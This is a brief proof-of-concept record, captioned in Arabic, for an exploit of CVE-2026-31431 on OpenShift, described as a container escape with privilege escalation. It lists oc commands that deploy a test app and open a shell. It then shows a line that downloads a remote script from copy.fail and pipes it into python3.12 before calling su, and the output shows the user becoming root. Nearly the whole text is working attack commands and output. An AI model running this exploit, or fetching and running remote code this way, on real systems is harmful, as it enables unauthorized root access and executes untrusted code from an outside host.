
إثبات مفهوم لاستغلال CVE-2026-31431 يوضح الهروب من الحاوية وتصعيد الامتيازات في بيئات OpenShift.
# oc new-app -n default https://github.com/gmeghnag/TEST-CVE-2026-31431
# oc rsh -n default deployment/test-cve-2026-31431
sh-5.1$ id
uid=1001(1001) gid=0(root) groups=0(root)
sh-5.1$ curl -s https://copy.fail/exp | python3.12 && su
[root@test-cve-2026-31431-78f6d9cc97-n7d5j /]# id
uid=0(root) gid=0(root) groups=0(root)